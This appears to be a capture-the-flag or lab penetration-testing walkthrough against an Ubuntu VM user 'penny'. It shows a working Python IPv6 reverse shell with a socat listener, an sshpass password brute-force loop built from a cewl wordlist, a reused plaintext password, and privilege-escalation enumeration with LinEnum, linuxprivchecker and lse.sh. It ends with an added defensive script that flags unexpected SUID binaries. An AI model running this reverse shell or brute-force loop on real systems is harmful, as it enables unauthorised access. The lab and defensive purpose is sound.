192.168.56.104 - - [26/Oct/2019 11:15:21] "GET /LinEnum.sh HTTP/1.1" 200 -
- Target machine (Penny): wget http://192.168.56.105:8000/LinEnum.sh
penny@ubuntu-16:/tmp$ wget http://192.168.56.105:8000/LinEnum.sh
--2019-10-26 11:15:18--  http://192.168.56.105:8000/LinEnum.sh
Conectando con 192.168.56.105:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 46108 (45K) [text/x-sh]
Grabando a: “LinEnum.sh”

LinEnum.sh          100%[================>]  45,03K  --.-KB/s    in 0,001s

2019-10-26 11:15:18 (86,7 MB/s) - “LinEnum.sh” guardado [46108/46108]
Copying a file over ssh:
sshpass -p 'OrgulloFriki' scp ./a.out penny@192.168.56.104:/tmp/
Shell over IPv6:
- Machine to control:
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::a00:27ff:fe2e:19d0%enp0s3",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
- Where: (parameters you will have to modify)
- IPv6 address of the controlling machine: fe80::a00:27ff:fe2e:19d0
- network interface to go out through: enp0s3
- listening port of the controlling machine: 1234
- Controlling machine: socat - tcp6-listen:1234
ssh access (password reuse)
Listing /home I see the system also has a user penny,
so I will try to log in over ssh:
with sshpass -p 'OrgulloFriki' ssh penny@192.168.56.104
I should be able to enter the system as a user with a full shell.
Building a wordlist from the contents of a web page:
cewl http://192.168.56.104/nibbleblog/ > diccionario_nibbleblog.txt
Using the words of a wordlist in a loop:
cat /tmp/diccionario_nibbleblog.txt | while read pass ; do ( echo $pass); done
cat ./diccionario_nibbleblog.txt | while read pass ; do ( \
echo $pass ; sshpass -p $pass ssh -q penny@192.168.56.104 \
); done
LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
( cd /tmp ; bash ./LinEnum.sh -r penny -e /tmp/ &)&
linuxprivchecker (no results)
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
penny@ubuntu-16:/tmp$ python ./linuxprivchecker.py
The following exploits are applicable to this kernel version
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
LinuxSmartEnumeration
penny@ubuntu-16:/tmp$ wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
penny@ubuntu-16:/tmp$ bash ./lse.sh -l1
 User: penny
 Hostname: ubuntu-16
 Linux: 4.4.0-87-generic
 Distribution: Ubuntu 16.04.3 LTS
 Architecture: x86_64

==================================================================( users )=====
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
adm:x:4:syslog,usuario
sudo:x:27:usuario
---
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
usuario:x:1000:1000:usuario,,,:/home/usuario:/bin/bash
penny:x:1001:1001::/home/penny:/bin/bash
---
[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/curl
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget
---
[*] fst010 Binaries with setuid bit........................................ yes!
---
/tmp/POC_SUID.o
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/at
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/bin/fusermount
/bin/ntfs-3g
/bin/mount
/bin/ping
/bin/ping6
/bin/umount
/bin/su
---
SUID binaries: ls -lha /bin |grep rws
Better known in this form: find / -perm -u=s -type f 2>/dev/null
penny@ubuntu-16:/tmp$ ls -lha /bin |grep rws
-rwsr-xr-x 1 root root  31K jul 12  2016 fusermount
-rwsr-xr-x 1 root root  40K jun 14  2017 mount
-rwsr-xr-x 1 root root 139K ene 28  2017 ntfs-3g
-rwsr-xr-x 1 root root  44K may  7  2014 ping
-rwsr-xr-x 1 root root  44K may  7  2014 ping6
-rwsr-xr-x 1 root root  40K may 17  2017 su
-rwsr-xr-x 1 root root  27K jun 14  2017 umount
penny@ubuntu-16:/tmp$ ls -lha /usr/bin |grep rws
-rwsr-sr-x 1 daemon daemon  51K ene 14  2016 at
-rwsr-xr-x 1 root   root    49K may 17  2017 chfn
-rwsr-xr-x 1 root   root    40K may 17  2017 chsh
-rwsr-xr-x 1 root   root    74K may 17  2017 gpasswd
-rwsr-xr-x 1 root   root    33K may 17  2017 newgidmap
-rwsr-xr-x 1 root   root    39K may 17  2017 newgrp
-rwsr-xr-x 1 root   root    33K may 17  2017 newuidmap
-rwsr-xr-x 1 root   root    53K may 17  2017 passwd
-rwsr-xr-x 1 root   root    23K ene 18  2016 pkexec
-rwsr-xr-x 1 root   root   134K jul  4  2017 sudo
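The setuid list that lse.sh prints above contains one entry that does not belong to any package, /tmp/POC_SUID.o, sitting among the expected system binaries. As an added example, not part of the original write-up, the script below does the defender's version of that SUID review: it flags setuid files outside the usual system directories and diffs the current list against a saved baseline. The function names, the expected-directory list and the constructed sample lists (taken from the lse.sh output above) are my own assumptions.

```shell
#!/bin/bash
# Added example: review a SUID/SGID inventory the way a host owner would.
# Live input comes from the find command in the write-up, for instance:
#   find / -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | flag_unexpected_suid

# Directories where a packaged setuid binary is expected to live (assumption).
SUID_EXPECTED_DIRS='^(/bin|/sbin|/usr/bin|/usr/sbin|/usr/lib|/usr/libexec|/usr/local/bin|/usr/local/sbin|/snap)/'

# Check 1: read one path per line on stdin, print those outside the expected
# directories (e.g. /tmp, /home, /dev/shm), where a planted binary usually ends up.
flag_unexpected_suid() {
    local path
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$path" | grep -Eq "$SUID_EXPECTED_DIRS"; then
            printf '%s\n' "$path"
        fi
    done
}

# Check 2: compare the current list (stdin) with a baseline file recorded on a
# clean install and print the entries that are new. Uses a temp file rather
# than process substitution so it also runs under plain sh.
suid_new_since_baseline() {
    local baseline_sorted
    baseline_sorted=$(mktemp)
    sort -u "$1" > "$baseline_sorted"
    sort -u | comm -13 "$baseline_sorted" -
    rm -f "$baseline_sorted"
}

# Constructed sample: the setuid entries lse.sh reported on the Penny VM.
SAMPLE_SUID_LIST='/tmp/POC_SUID.o
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/su'

# Constructed baseline: the same set as recorded before the box was modified.
SAMPLE_BASELINE='/bin/mount
/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine'

# Entries of the sample outside the expected directories; expected: /tmp/POC_SUID.o
unexpected_in_sample() {
    printf '%s\n' "$SAMPLE_SUID_LIST" | flag_unexpected_suid
}

# Entries of the sample absent from the baseline; expected: /tmp/POC_SUID.o
new_in_sample() {
    local baseline_file
    baseline_file=$(mktemp)
    printf '%s\n' "$SAMPLE_BASELINE" > "$baseline_file"
    printf '%s\n' "$SAMPLE_SUID_LIST" | suid_new_since_baseline "$baseline_file"
    rm -f "$baseline_file"
}

echo "outside expected dirs:"; unexpected_in_sample
echo "new since baseline:";    new_in_sample
```

Both checks point at the same file here; on a real host the baseline diff also catches a setuid bit added to an already-packaged binary, which the location check alone cannot see.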
References
https://www.navajanegra.com/2019/
https://fwhibbit.es/euskalhack-iv-pentesting4ever-illidan
https://fwhibbit.es/en/euskalhack-iv-pentesting4ever-illidan-2
https://fwhibbit.es/en/author/naxhack5